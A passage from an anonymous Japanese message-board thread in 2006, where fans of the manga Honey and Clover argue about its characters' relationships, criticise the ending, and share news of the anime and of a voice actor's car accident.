「嗚呼!!されど青春ごっこ」という歌で
最終回でツーアウト そんなときでも笑える〜そんな大人になりた〜いい

って歌ってた。なんか聞いたことあるよな

438 :花と名無しさん:2006/08/09(水) 13:12:28 ID:???0
はぐと森田の恋愛成分は同志愛が50%以上だからややこしい
同種愛というか。下手をすると同病相憐れむ状態になるので
はぐは物理的に離れてるほうがいいと判断したのでは。
あと森田兄も弟がピーターのところに行くのを喜んでたな。
凡人界にいると周囲の人間にとって迷惑な存在なので
とかく竹本にも修にも遠ざけられ、遠くに飛ばされた感じの森田。不幸な男・・

439 :花と名無しさん:2006/08/09(水) 13:28:47 ID:???0
>>438
それだって、最後の方で急に無理やり「同病相憐れむ状態」に持ってった気がした。
お互い才能にほれ込んだ部分はあったけど、
それひっくるめて途中まで普通の恋愛感情で書いてた気がする。

440 :花と名無しさん:2006/08/09(水) 13:39:06 ID:???0
途中までは天才同士がどうとかというよりも
小学生同士の初恋みたいな初々しさを感じたなあ >森はぐ
自分の気持ちがどういうものなのか自覚していない所とか

ところで、このままの状態だと真山は今まで以上に恋愛とはまた別の意味で
山田に執着しそうな気がするんだが
作中での身近な友人である竹本・森田は東京を離れ、修もいなくなったせいで
唯一残された親しい友人である山田(+藤原デザインチーム)と一緒にいたがりそうだよな

441 :花と名無しさん:2006/08/09(水) 14:10:47 ID:???0
はぐはあきらかに森田の才能(と、キケンな香り?)に惚れてたけど、
森田ははぐの容姿も才能も含めた「無垢さ」みたいなものに惚れてた気がする。
自分が汚れてるという自覚があって、余計に。
>>440 飲み屋にうるさく口出しそうだなー…

442 :花と名無しさん:2006/08/09(水) 14:56:17 ID:???0
>>440
リカといい感じになってるから、山田に執着なんて
アリエネーだろ。
つか、真山はイタリアにリカとずっといるんじゃないの?

443 :花と名無しさん:2006/08/09(水) 15:37:05 ID:???0
>>418
確かにその通りですな。

森田に対して才能と金だけの人間発言でたけのこ人格崩壊って言われてるけど、
あれは今まで散髪とか寝袋軟禁とかフルーチョとかで散々な目に遭ってるし、
どっちもフられたフラストレーションをぶつけたかっただけのただの口喧嘩だと思う。

少なくとも修はぐにおめでとうに比べたら全然違和感はない。

444 :花と名無しさん:2006/08/09(水) 15:52:24 ID:bJIr06TuO
9巻読んだけど、8巻の終わりから9巻で何でいきなりあんなシリアスになったー?
山田と飲み屋さんの続きにドキドキしながら読んだのに幻滅↓↓↓
マジ意味不やぁー

445 :花と名無しさん:2006/08/09(水) 15:52:58 ID:???0
↓↓↓

446 :花と名無しさん:2006/08/09(水) 16:15:52 ID:VoJHsE3I0
>>444
知らんがな

447 :花と名無しさん:2006/08/09(水) 16:55:26 ID:???0
一泊朝帰りでもなんにも起こらないのがこの漫画のすごいところ。
でも野宮も殴られないように工作してたっけね
一応朝帰りにそういうイミはあるんだ、この漫画でも。

はっ、山田野宮の時に比べてぼかしてあるのは、実はなにか起こってた!?

448 :花と名無しさん:2006/08/09(水) 17:16:31 ID:???0
>>442
だから「恋愛とはまた別の意味で」

真山自体がハブられるのを極端に嫌がる設定なだけに、
理花がいたとしても友達が全くいない状況には耐えられなさそうだしな
だからそのために山田含めた藤原デザインメンバーに執着するのではないかと

山田と野宮にとっては激しく自分勝手かつ迷惑な話だが

449 :花と名無しさん:2006/08/09(水) 17:58:03 ID:???0
山田の為にはしばらくは距離置いてやるのが優しさだと思うけど
野宮の存在免罪符にして山田含めた藤原デザインメンバーに寄ってきそうだもんな

別に友達作れよ真山

450 :花と名無しさん:2006/08/09(水) 18:08:38 ID:dETww0ia0
この漫画におけるNGワード

・常識
・友達



451 :花と名無しさん:2006/08/09(水) 18:09:50 ID:???0
ごめんageちった

452 :花と名無しさん:2006/08/09(水) 18:15:32 ID:???0
スピンなんたらってなに?

453 :花と名無しさん:2006/08/09(水) 18:51:40 ID:VQ6Y0Ub2O
山田たんの為だけに、わざわざアニメから漫画に入りました

454 :花と名無しさん:2006/08/09(水) 19:55:16 ID:???0
真山はいまさら飲み屋と山田の関係にグダグダ言わないよ。
山田だって言われたくないだろうし。
バカなこと言ってるのはアニメから流れてきたオタク男?


455 :花と名無しさん:2006/08/09(水) 19:57:56 ID:???0
真山が何も言わなくても山田の周辺に現れるだけで
充分gdgdになるだろ

ただでさえ山田は真山を忘れられなくて悩んでるのに

456 :花と名無しさん:2006/08/09(水) 20:48:35 ID:???0
特別なエピソードもなくここまでひきずる山だが正直きもちわるい
おまえそれもう意地じゃねーのっていう

賛否両論のたけのこだけど
作者の都合いいようにいいこちゃんにしかうごかない周りよりは
本音出したたけのこのほうがまし
なんだろう書いててほんとに山田が怖くなってきた
ストーカーにはストーカーが惚れるのか・・・

457 :花と名無しさん:2006/08/09(水) 21:07:37 ID:???0
真山に異常に固執する山田
ご存知ストーカーの真山
後追い未遂リカ
真性ロリ修
恋愛異常者ばっかりですよ


458 :花と名無しさん:2006/08/09(水) 22:02:02 ID:???0
>457
リカはちゃんと後追いしたくなっても仕方がないようなことがあったわけだから
他の3人とはちょっと違う気がする。

459 :花と名無しさん:2006/08/09(水) 22:20:11 ID:???0
山田が意地になってるのは本編でもしっかり書いてあったよ。
この片想いだけが自分の宝物だったのに…みたいな。
片想いに酔ってんだよ。
片想い状態が気持ちよくなっちゃってたんだよ。

460 :花と名無しさん:2006/08/09(水) 22:24:22 ID:???0
>>459
そういう部分がイタかった自分の厨房時代を思い出すから嫌い
山田ときたら大学生にもなって似たようなことやってんだからな

461 :花と名無しさん:2006/08/09(水) 22:33:44 ID:???0
真山が山田のまわりをうろついているわけではなく
山田が真山のテリトリーに入ってきているだけでしょ。
藤原デザインでの仕事を受けなければ
卒業後の学生友達なんて疎遠になるモノなのに
真山との接点が欲しいから仕事を引き受ける山田。
しかも真山は反対してるのに…

山田ウザイ

462 :花と名無しさん:2006/08/09(水) 22:36:45 ID:???0
そういう部分に自分の厨房時代を思い出して気持ちよくなってるのが
真山―山田ラインのファン

リカ―真山―山田ラインはマーガレット〜レディコミ読者のため
竹本―はぐ―森田ラインは花とゆめ〜青年コミック読者のためにあった。

463 :花と名無しさん:2006/08/09(水) 22:40:04 ID:???0
山田が男性読者(オタク)に人気あるのはルックスのせいだしな。
ウミノキャラの女身体の線の細さがエヴァのパイロットスーツ?を連想させるらしい。

464 :花と名無しさん:2006/08/09(水) 22:43:23 ID:???0
まんまあや並み出してるしな
信者はやたらそれを否定するけどおもいっきり参考にしてるのは
あきらかじゃん

465 :花と名無しさん:2006/08/09(水) 22:43:59 ID:???0
>>463
エヴァのプラグスーツなんか、ぜんぜん連想せんよ。

とにかく、男は華奢な女が好きなだけだ。

466 :花と名無しさん:2006/08/09(水) 22:47:00 ID:???0
8巻挿絵で山田が着てたね

467 :花と名無しさん:2006/08/09(水) 22:47:18 ID:???O
山田にしてもはぐにしてもリカにしても
どいつもこいつも不快な女ばっか
こいつらを良しとする男もおかしい

468 :花と名無しさん:2006/08/09(水) 22:50:59 ID:???0
>>462
なるほどな

469 :花と名無しさん:2006/08/09(水) 22:51:12 ID:???0
オタ男の理想なんじゃないか
全てこちらまかせのロリ娘
ストーカー並の好意をよせてくる美乳ビジン
綾なみまんまの陰のあるビジン

ちちなみにうちの弟は読ませたら
読みにくい!っていって一巻全部よめないままアウトだった
ごちゃごちゃしすぎなの四方八方からのびてくる
寒いポエムがだめだったようだ・・・

470 :花と名無しさん:2006/08/09(水) 22:53:47 ID:???0
>>460
しかもそれを描いてるのが40近い女だし

471 :花と名無しさん:2006/08/09(水) 22:54:12 ID:???0
山田は脚の線がきれいなのがよかった。
初め頃結構色々サービスしてたしな。
そんだけ。

>>469
四方八方からのびてくる寒いポエムとは
言い得て妙だなw

472 :花と名無しさん:2006/08/09(水) 22:55:57 ID:???0
>>469
オタ男ですが、はぐと山田は理想のタイプです。

でも、リカだけはだいっ嫌い。

473 :花と名無しさん:2006/08/09(水) 22:58:02 ID:???0
「ずっと2人で飲んだくれてくれたらいいのに・・・」

自分本位な女ばっかりだよな…
自分の才能生かすためにロリ癖のいとこおとしたり

474 :花と名無しさん:2006/08/09(水) 23:02:21 ID:???O
この場合いちばん酔っ払ってるのは作者
叶わぬ片想い可哀想でしょ?みんな
みたいな

475 :花と名無しさん:2006/08/09(水) 23:06:34 ID:???O
>>465
儲乙

そして藻前の趣味押し付けウザス

476 :花と名無しさん:2006/08/09(水) 23:07:04 ID:???0
自分の中のハチクロは
7巻でオワタ\(^o^)/

477 :花と名無しさん:2006/08/09(水) 23:08:35 ID:???0
8巻以降は同人誌。

478 :花と名無しさん:2006/08/09(水) 23:11:32 ID:???0
ホント竹本厨はタチが悪いな

479 :花と名無しさん:2006/08/09(水) 23:22:41 ID:???0
>>475
デブ乙。

480 :花と名無しさん:2006/08/09(水) 23:53:31 ID:???O
ホント森田厨はタチが悪いな

481 :花と名無しさん:2006/08/09(水) 23:55:54 ID:???O
>>479
ガリ乙

482 :花と名無しさん:2006/08/10(木) 00:22:12 ID:???0
>>481
メガネ乙

483 :花と名無しさん:2006/08/10(木) 00:26:03 ID:???0
>>473
自分で呼びつけたくせにその言い草はどうよ?と思った>二人で飲んだくれて〜

484 :花と名無しさん:2006/08/10(木) 00:58:44 ID:???O
>>482
ロリ乙

485 :花と名無しさん:2006/08/10(木) 01:42:40 ID:???0
はぐノートって要するにスクラップブックでしょ?
竹本が「高ッ」って言ってるけど、普通値段まで貼るか・・・?

486 :花と名無しさん:2006/08/10(木) 01:49:02 ID:???0
これくらいで買えるから、たけのこかっておいてね。
そしたら笑顔くらいはくれてやるよ。

487 :花と名無しさん:2006/08/10(木) 02:07:10 ID:???O
>>486
恐ろしい子!

488 :花と名無しさん:2006/08/10(木) 02:12:16 ID:???0
竹本役の神谷浩史さんが交通事故に遭って入院した…
アフレコ終わってなければで代役が立つ可能性も(´;ω;`)

489 :花と名無しさん:2006/08/10(木) 02:47:54 ID:???0
リアルたけのこまで不幸でカワイソス
たけのこの不幸力は声優にまで波及したのか

490 :花と名無しさん:2006/08/10(木) 03:32:51 ID:???O
というよりはぐの呪縛

491 :花と名無しさん:2006/08/10(木) 04:15:29 ID:???O
櫻井は大丈夫かな

492 :花と名無しさん:2006/08/10(木) 04:47:03 ID:???O
ウミノはお見舞いとしてはハチクロサンドを作って持っていくだろう。

493 :花と名無しさん:2006/08/10(木) 05:24:21 ID:???0
入院してるなら腹壊しても問題ないね

494 :花と名無しさん:2006/08/10(木) 11:41:59 ID:???O
危篤とかじゃないのか

495 :花と名無しさん:2006/08/10(木) 12:41:51 ID:???O
このスレ ネタ化してるなw
はぐとか

496 :花と名無しさん:2006/08/10(木) 13:00:01 ID:???0
>>463
男だがハチクロの女キャラは異性として見たらあまり好きじゃない。
はぐはガキすぎるし、色んな意味で病んでて細すぎるリカにも全然興味湧かない。
ガリッガリよりはポッチャリ系のが男にはモテると思う。

男から見たら、たけのこの自転車の旅とか真山のストーキングとかに
やった事はないがなんかちょっとわかるみたいな共感を覚える。真山はやりすぎだけど。
森田はありえない人間だがこんな風になれたらいいなあと思いながら見てる。
恋愛描写は全然進展しないうえに執着しすぎで共感しにくい。
これは男とか女とか関係なく作者の好みなんだろうけどさ。


とりあえず男ならカカト落とししてる山田のパンツを
見てみたいと絶対に思ってるんだ。山田の内面はどうでもいい。

497 :花と名無しさん:2006/08/10(木) 13:55:35 ID:???0
初心者の俺に教えて欲しいんだが、3つ目の答えって何?

498 :花と名無しさん:2006/08/10(木) 14:14:52 ID:???0
>>497
努力も諦めもせずに現状維持する「何もしない」じゃないの。

自分が変わるんじゃなくて相手が変わるまで何もしない
「待つ」行為とも言える。なんかそんな感じじゃね。

499 :花と名無しさん:2006/08/10(木) 14:49:03 ID:???0
付き合うなら竹本が一番いいな。
なんか可愛い。

500 :花と名無しさん:2006/08/10(木) 14:51:14 ID:???0
>>498
そうかーサンクス
ということは、修ちゃんは虎視眈々とリカさんをねらってたのか(;・`д・´)!

501 :花と名無しさん:2006/08/10(木) 16:02:26 ID:???0
>>496
漏れも山田のパンツはすごく見たい。

502 :花と名無しさん:2006/08/10(木) 16:34:53 ID:???O
山田のパンツの中が見たい

503 :花と名無しさん:2006/08/10(木) 16:57:18 ID:???0
漫画の中の女キャラのパンツ見たいって……
恐ろしい子達!!


504 :花と名無しさん:2006/08/10(木) 16:58:25 ID:???0
真山ってはぐのこと敬遠とか一番してなかったよね、意外に

505 :花と名無しさん:2006/08/10(木) 17:25:50 ID:???0
日本語でおk

506 :花と名無しさん:2006/08/10(木) 17:29:13 ID:???0
しばらく見ん間に連載終了してたのかYo!
まぁもうすぐ終わるのは周知だったわけだが

内容的に打ち切りっぽいね。9巻辺りから準備が始まってたか
終盤の内容の賛否はともかく、けっこう不遇な漫画家だなぁとは思う。
掲載誌が相次いでなくなって、最終的にコーラスに降り立ったけど、
結局居場所がなかったんじゃないかなぁ。

とりあえずウミノお疲れって感じ。

507 :花と名無しさん:2006/08/10(木) 17:29:47 ID:???0
最終回読んだときは終わってしまう寂しさからか泣けたんだけど……
落ち着いて読み返すとやっぱりつまらんよ。
みんな何か悟ってそれぞれの道を進みはじめたって感じだけど幸せが小さいしよくわからん。
現実に生きていてもそんな大きな幸せってめったにないし
5人全員が都合良く相手が見つかって片想いはハッピーエンドっていう
マンガではないとわかってたけど何だかな〜という感じ。
苦労とか不幸とか努力とかの要素がいちばん無かった山田を
最後にしあわせにしますっていう作者も何だかな〜だし。


508 :花と名無しさん:2006/08/10(木) 17:40:49 ID:???0
>>500 えっ?理花さんなの??はぐじゃなくて??

509 :花と名無しさん:2006/08/10(木) 17:41:18 ID:???O
アニメは10話で9巻まで行くね
アニメ雑誌には はぐと森田 竹本 修のオリジナル絵が載ってた うまい絵
はぐと森田はなぜか手をつないでた
竹本は手を中途半端にのばしてる感じwWWカワイソス

510 :花と名無しさん:2006/08/10(木) 17:48:09 ID:???0
たけ…不憫な子…w

511 :花と名無しさん:2006/08/10(木) 17:52:58 ID:???0
竹本が一番性格いいのに

512 :花と名無しさん:2006/08/10(木) 18:17:51 ID:???0
美容院の待合室で読んだnon-noに堺のインタビュー載ってた。
「この人がウミノ☆さんの萌え萌え俳優かー」
と思いながら読んでしまった。
そこそこかっこよかったかな。
(顔は全然美形じゃないけど、雰囲気がイイ)
俳優として売れない不遇の時代があったことは
自分にとって良かった…みたいな発言をしてた。

513 :花と名無しさん:2006/08/10(木) 18:23:39 ID:???O
>>507
たぶんウミノタソは山田とゆうより、野宮を幸せEndにしたかったんでそ

514 :花と名無しさん:2006/08/10(木) 18:24:31 ID:???0
>>504
たしかにしてはなかったかも
>>505
アホスwww

515 :花と名無しさん:2006/08/10(木) 18:54:40 ID:???0
>>514は、近ごろ珍しい、とてもわかりやすいジサクジエンだなwww


516 :花と名無しさん:2006/08/10(木) 19:03:28 ID:???0
>>509
なんてアニメ雑誌に載ってたのかkwsk!

517 :花と名無しさん:2006/08/10(木) 19:14:59 ID:???0
>>516
そりゃハチクロのアニメが放送されてるからでしょ。

518 :花と名無しさん:2006/08/10(木) 19:15:51 ID:???0
うわっ、間違えた。
書き逃げしようっと。

519 :花と名無しさん:2006/08/10(木) 19:20:58 ID:???0
>>518
さては「なんで」と「なんて」を読み間違えたな?w

520 :花と名無しさん:2006/08/10(木) 19:28:08 ID:???O
>>519
言わないであげてー

521 :花と名無しさん:2006/08/10(木) 19:47:44 ID:???O
>>516
なんだっけ アニメジューだったかなぁ
四つ葉の上で寝転ぶ 森田 竹本 はぐ 修
正直 修が描かれる事 めったにないから嬉しかった

522 :花と名無しさん:2006/08/10(木) 21:12:22 ID:???0
>>521
d!

523 :花と名無しさん:2006/08/10(木) 21:42:26 ID:???0
臭になる前の修は好きだったんだけど
臭になってからはボミョー。

「年の差カップル萌え」って女子、女性は多いんだろうけど
私は、「ロリコン」を連想してしまうので苦手です。

524 :花と名無しさん:2006/08/10(木) 21:43:49 ID:???0
いや、さすがに修とはぐはナシかなぁ、私も。

525 :花と名無しさん:2006/08/10(木) 21:48:10 ID:???0
竹本の中の人、交通事故で肺をつぶす重体で、今も集中治療室にいるんだってね
どうするんだろな…

526 :花と名無しさん:2006/08/10(木) 21:54:07 ID:???0
なんくるないさー

527 :花と名無しさん:2006/08/10(木) 21:56:27 ID:???O
>>525
はぐ、恐ろしい子!

528 :花と名無しさん:2006/08/10(木) 21:59:17 ID:???0
アニメ見てないから作品は知ったこっちゃないんだけど、
その人大変だね・・・直るといいね・・・
でも肺つぶれるとか、命が助かっても仕事復帰はムリなのかな

がんばれー(´;д;`)

529 :花と名無しさん:2006/08/10(木) 21:59:18 ID:???0
犯人ははぐなのかよw

530 :花と名無しさん:2006/08/10(木) 23:11:20 ID:???0
あの声の人いいよね。
あの声で竹本が好きになった。

531 :花と名無しさん:2006/08/10(木) 23:19:47 ID:???0
山田の異常料理
男連中が注意できないみたいな雰囲気だけど、
山田の女友達は指摘しないのかなあ・・・。

どんどんどんどん酷くなってってイチゴと白米とか、最早味覚音痴☆とかじゃないと思うんだけど・・・。

532 :花と名無しさん:2006/08/10(木) 23:23:16 ID:???0
おもしろいからいいじゃん

533 :花と名無しさん:2006/08/10(木) 23:25:32 ID:???0
面白いか・・・?

534 :花と名無しさん:2006/08/10(木) 23:34:33 ID:???0
好みによるんじゃね?

535 :花と名無しさん:2006/08/10(木) 23:46:06 ID:???O
ちょ....ハチクロアニメ
最終回のアフレコ 今週で まだ終わってないみたいだぞ.....
似た人もってこないと駄目ぽい
とりあえず頑張っ

536 :花と名無しさん:2006/08/10(木) 23:59:15 ID:???0
>>531
山田も女友達、実は少な気なきがしてきた

537 :花と名無しさん:2006/08/11(金) 00:06:46 ID:???0
山田、女友達いるのか…?

538 :花と名無しさん:2006/08/11(金) 00:08:34 ID:???O
初期山田なら普通にいそう

539 :花と名無しさん:2006/08/11(金) 00:11:06 ID:???0
あの合コン話読んじゃったせいか、
もはや女友達に敬遠されるDQNにしか見えない>山田
ルックス良くて男人気高くてしかも天然くさいって、
女から見たらどうよ

540 :花と名無しさん:2006/08/11(金) 00:24:02 ID:???0
>>531
言えるほど親しい女友達がいないのでは・・・
一番仲がいいのがはぐ?

541 :540:2006/08/11(金) 00:25:32 ID:???0
リロってなかった・・・
みんな同じこと思ってるんだね。

542 :花と名無しさん:2006/08/11(金) 00:30:56 ID:???0
初期はいそう。
というかはぐと付き合い出してから他の友達づきあいがおろそかになったんじゃ?
山田が他の友達といるとこ見たら
またあのはぐみちゃんは「おなかがいたいかも〜」ってなりそうだし。
文化祭で真山に会いたくてうろうろしてたときは、
普通に友達といたよね。

543 :花と名無しさん:2006/08/11(金) 01:26:39 ID:???0
「神谷浩史 交通事故」でググっても、ハチクロ内の原田の事故の
ことしか出てこないよう。

544 :花と名無しさん:2006/08/11(金) 01:30:00 ID:???0
間山への感情のあの溜め込みっぷりは
少なくとも、女友達とかに相談してない感じ。
はぐとかは、間山の事好きなこと知ってたかどうかも危うい。

町内会の同世代やら朱実さんやらが山田の好きな人(失恋)は皆知ってるという人間関係もなぞだけど。

545 :花と名無しさん:2006/08/11(金) 01:31:04 ID:???0
>>543
「神谷浩史」でググったらWikiにあった。

>2006年8月7日、交通事故に遭い入院。暫くの間は治療に専念するため、全ての仕事を休業している。



546 :花と名無しさん:2006/08/11(金) 01:33:40 ID:???0
>>545
ありがとう。速いね、Wiki・・・。
ファンサイトを見てみたら、BBSがファンの人たちの悲嘆の声で
阿鼻叫喚になっていた。

547 :花と名無しさん:2006/08/11(金) 01:34:43 ID:???O
>>543
不謹慎だが ワラタ.....
竹本頑張って

548 :花と名無しさん:2006/08/11(金) 01:51:45 ID:???0
>>544
確か、合コン話の時に酔ってベラベラ
真山への思いを口にしてた。
女友達も、真山に山田と付き合えって攻め立ててた。
だから溜め込んでない気がする。

1巻で、(真山への思いは)一度も口にしたことがないって言ってたけど
合コンで喋りまくり・・・と萎えた。

549 :花と名無しさん:2006/08/11(金) 02:05:59 ID:???0
あちこちのオサレ系雑誌のインタビューで言ってた
「この漫画で伝えたい事は、若い人達に大人になる事は決して
嫌な(怖い)事ではないと言う云々〜」ってのは何だったんだろう…

人間ってもんは一生青春=一生子供(『自分が一番思考』の幼稚)的な
エンディングだったのに

550 :花と名無しさん:2006/08/11(金) 02:08:56 ID:???0
>>548
たぶん真山だけには喋っていないし悟られていなかったつもりだけど
実は周囲だけでなく真山本人にもモロバレ、ってのが正しい気がしてきた

551 :花と名無しさん:2006/08/11(金) 02:11:18 ID:???0
>女友達も、真山に山田と付き合えって攻め立ててた。

うわっ!ウザー。
本人以外から攻め立てられるのってすごいウザイんでヤメて欲しい。
断ってもギャーギャー言われるし
相手を好きでも「好き」ってことは本人に伝えたいし
女友達が出てくるオクテ女は一番タチが悪い。
自分では動かないけど自分の思い通りにならないと気がすまない女が多い。

552 :花と名無しさん:2006/08/11(金) 02:14:17 ID:???0
ハチクロ内での山田のキャラ位置って恋する乙女って言うより
自己愛性人格障害って風にしか見えなかった。あのヒスっぷりと言い。

553 :花と名無しさん:2006/08/11(金) 02:17:58 ID:???0
ところで話がガラッと変わるけど、
今日の多摩川花火大会会場の土手が、みんなで四葉のクローバーを探した場所の
モデルになっているのかな、と思った

電車も見えるしクローバーももっさりと生えていたので

554 :花と名無しさん:2006/08/11(金) 02:46:55 ID:l31TZuDc0
蒼井優がヘッドホンつけてる画像誰か持ってませんか?

555 :花と名無しさん:2006/08/11(金) 02:49:45 ID:???O
はぐと修がくっつくの?ロリかよ。
良かった〜2巻までしか読んでなくて★

556 :花と名無しさん:2006/08/11(金) 02:51:56 ID:???0
蒼井優って今度は鉄コンのシロの声優やるんだね

557 :花と名無しさん:2006/08/11(金) 05:00:38 ID:???O
叩かれるかもしれないけど、山田のマヤマへの執着はリアルだなと思った
好きって思い込んだら曲げられない子いるよね
森田が言ったように、相手は気を遣ってやさしくしてくれて余計調子にのったりして。
大学生にもなってとは思うけど、山田はそれまで恋愛経験ないわけだから実質中学生と思えば納得いくし。

558 :花と名無しさん:2006/08/11(金) 06:35:52 ID:???O
>>557
実質中学生じゃないでしょ…
商店街連中に惚れられてるの自覚してたくせに
見ぬフリしていいように使ったり友達ヅラして
なあなあにするような頭は持ってたんだし。
いざ真山に自分がそれをやられたら怨怨怨→時に真山のせいにして爆発って
二十代前半〜半ばのやる事じゃないよ。異常すぎ。

真山に対して世話焼きな山田だった辺りまではまだ普通だったのに…
作者の人格が色濃く出始めてから崩壊したよね。漫画もキャラも。

559 :花と名無しさん:2006/08/11(金) 08:39:51 ID:???0
山田擁護するわけじゃないけど山田みたいな子は多いよ
普段サッパリ(さばさば?)してて付き合いやすいなって思ってても
恋愛のことになるとまるで人がかわったように子供っぽくなっちゃったりして。
山田と森田の関係みてればわかるけど山田には深くつっこまないほうがいい付き合いできるんだと
思う。(森田は山田のこと大切な友達だとは思ってるだろうけど、山田を守ろうとは
思っていないだろうし。それが大人の付き合いだって無意識にわかっているんだろうと思う)

真山は山田が大切?だから山田の心の深い部分まで守ってあげようとしてたんだけど
それが逆目に出たような。
でも山田みたいな子って自分の好きな人に、自分と同じように思ってもらえないと
「どうして私ばっかり辛い思いするの〜」みたいなこと言い出しちゃうから、困ったもんだよね

560 :花と名無しさん:2006/08/11(金) 08:41:22 ID:yki1dSOy0
森田って・・・・・・・・

561 :花と名無しさん:2006/08/11(金) 10:52:02 ID:???0
アニメも鬱展開。動画で音楽込みみ見るとこれがまた重い。
カオルの独白はちょっと泣けた。
気になるのはマンガであれほど繰り返して表現した
「光の方へ」って言葉がほんのちょっと出ただけだった。
何か意図を感じる。

562 :花と名無しさん:2006/08/11(金) 11:26:56 ID:???0
竹本声優さん重体って
はぐみ&ウミノの呪いか!?
恐ろしい子&恐ろしい腐ヲバ!

563 :花と名無しさん:2006/08/11(金) 12:07:42 ID:???0
>>559
自分は真山の態度は山田の心の深い部分を守ろうとしたというより
単なる自己満足でしかなかったように感じてた

だって真山自身は山田に振り向かないまま保護者したかったのかもしれないけど
結果的にはそれが山田の為にならないことは修や野宮から散々指摘されてたじゃん
本当に山田のこと思ってるのなら違う方法とってたと思う

山田が真山へ片想いしてる自分に酔ってたように
真山も山田の保護者してる自分に酔ってたようにしか見えん

564 :花と名無しさん:2006/08/11(金) 12:26:54 ID:???0
>>562
いくらなんでも不謹慎だよ。

565 :花と名無しさん:2006/08/11(金) 12:28:14 ID:???0
どっちかというと山田を振ることによって、山田という友達を失うのが嫌だという風にしか
見えなかったな、真山は
「告白を断ったらどこかに行ってしまいそうで」の部分から想定すると
曖昧なままでいればずっと自分の傍にいてくれることを自覚しているんだろうね

ある意味保護者を名乗ってずっと別の意味で執着していたのは
山田が成長することで自分から巣立って欲しくない気持ちの表れなのかもしれないな、と

566 :花と名無しさん:2006/08/11(金) 12:45:45 ID:???O
彼氏になる気はなくて
束縛ジェラシーはある
でも愛してるじゃなくて
君だけの特別でいたい

567 :花と名無しさん:2006/08/11(金) 13:28:41 ID:???0
山田の彼氏の選別までしだすのは完全に余計なお世話。
真山と山田の関係と山田の野宮の関係は全然別問題で
そこに首つっこむのは真山のエゴでしかない。

568 :花と名無しさん:2006/08/11(金) 13:57:47 ID:???0
真山→山田の感情のほうがまだわかるかな。
ずっとスキスキ言われてて、自分は相手のこと好きじゃないからつれなくしてて、
でもいざその相手の気持ちが他の人に移るとなんかさびしくなったりする。
加えて野宮のこと遊び人だと思ってたなら、阻止しようとするのも理解できるんだけど。
納得いかないのは、まやまがやまだにつれなくしてないとこだ。

ところで、竹の子の中の人の事故が連載中だったら、話のすじ変わってた気がする。


569 :花と名無しさん:2006/08/11(金) 13:57:52 ID:???0
1巻で、オレを見るのやめろと突き放す真山よかったのにな。
いつから、世話焼きおばちゃんになったんだ?

570 :花と名無しさん:2006/08/11(金) 14:00:19 ID:???0
魔山は支配欲が強いんだと思う
自分が興味がある人間に関しては、全て把握しておきたいっていう感じなんでは。
それがストーカー気質にもつながっていると。

そういう意味では、魔山も結構リアルなキャラだと思う。
リアルでよくある話↓
ブサが付きまとうとストーカーと非難されてけちょんけちょんに言われるけど、
男前(風)の付きまといは何となく許されてしまう。 ←魔山はこっち

571 :花と名無しさん:2006/08/11(金) 14:20:27 ID:???0
自分がふっちゃったフォローのために
自ら進んで野宮とくっつけようとする、のほうが普通かな。
そんで、「自分は本当に山田の幸せを願ってるのか?罪悪感ぬぐいたいだけなんじゃ?」と葛藤。

>>570
自分がストーカーされた相手は元カレでなかなか顔は良かったけど、
本当にストーカーされたらいくら相手がかっこよくても許せない。
パソコン覗くとかケータイチェックくらいならまだいいけどさぁ。

リカが元から(ストーカーになるくらい)かまって!ってゆうのを奥底に持ってたから
可能だったというか成り立ったんだろうね。

572 :花と名無しさん:2006/08/11(金) 14:22:17 ID:???0
>>568
> ところで、竹の子の中の人の事故が連載中だったら、話のすじ変わってた気がする。

確かに、竹本の待遇が良くなっていた可能性が高いね〜w


573 :花と名無しさん:2006/08/11(金) 14:25:07 ID:???0
>>571
「付きまとい」のニュアンスが誤解を与えてしまったようだな。
スマソ

574 :花と名無しさん:2006/08/11(金) 15:59:38 ID:???0
>>568
序盤で諦めろとか、思いっきりつれなくしてたと思うけど?
罪悪感が混じった友達感覚の対応に
酔いつつ甘えている山田がどうかと思う。
完全無視も手だったかもしれないけど、
振った瞬間に赤の他人になる訳でもないし。
学校でも仕事でも山田自ら乗り込んで行ってる描写も多かった。
あまりの粘着ぶりに自分には
真山でなく片思いの自分に恋してるようにしか見えなかったよ。

575 :花と名無しさん:2006/08/11(金) 16:07:17 ID:???O
真山にも山田を恋人にはしないけど
手の届くところに置いておきたいというエゴがある

576 :花と名無しさん:2006/08/11(金) 16:23:30 ID:???0
>>574
そこは(作者がキャラに言わせている印象もあったが)
散々作中でも森田と野宮が山田に指摘していたじゃん
山田本人にも恋愛感情でなく既に意地に近いという自覚がはっきりとあるわけだし

で、真山自身にも山田を恋愛感情ではなく単なる所有欲と寂しさが原因で
手放そうとしない描写は要所要所であったわけで
真山にとっては「振った瞬間に赤の他人になり」もう2度と
山田に会えなくなるのが怖いと自分でもわかっているわけで

そうでなければ野宮が山田に興味を持った段階で必死に止めることはないと思うんだが
どうでも良いかウザければ遊び人かどうかなんて関係なしに投げるだろう

577 :花と名無しさん:2006/08/11(金) 16:26:20 ID:???0
>>575
手の届くところに置いておきたい、幸せになって欲しいという気持ちがそう見えるだけで
恋愛対象としては眼中に無いでしょ
世話焼き過ぎて懐かれてしまっていては本末転倒だけれど

578 :花と名無しさん:2006/08/11(金) 16:30:24 ID:???0
真山がおんぶして山田を送っていく話で
俺はお前がかわいいんだとか、断ったら離れていくのがとか
gdgd言ってたね。
リカさんへの想いも語ってたけど。

その後、徐々に真山を諦めるかと思ったけど想いが増してるし
三代目達にプロポーズされた時に、真山の立場がわかって
いよいよ諦めるかと思ったら、泥沼に陥ってたもんな・・・。

579 :花と名無しさん:2006/08/11(金) 16:36:15 ID:???0
1巻読み直してるけど、鉄人時代の山田好きだな〜。
いつからかモテモテで処女をユニコーンにガードされる
純粋無垢な乙女になってしまった。
それに合わせて、真山の過保護っぷりも凄くなっていったような?

580 :花と名無しさん:2006/08/11(金) 16:36:53 ID:???0
>>576
別に恋愛感情無くても、自分に好意を持っていた女の子が
偏見でも変な男に引っかかりそうだったら必死で止めるんじゃない?
恋愛感情かウザいかの2択が人間関係じゃないと思うんだけど

581 :576:2006/08/11(金) 16:40:41 ID:???0
>>576じゃなくて>>566

582 :花と名無しさん:2006/08/11(金) 16:46:10 ID:???O
>>580>>581?
間違えたんだと思うけど落ち着けw

こうやって見ると山田に共感出来るかどうかで温度差が凄まじいね
自分は山田も真山も共感できないけど、山田は作中でマンセーされている分
甘さと無神経さに腹が立つ

583 :花と名無しさん:2006/08/11(金) 16:53:31 ID:???0
正直なところ山田には、野宮と付き合うことを送別会の席で宣言してもらいたかった。

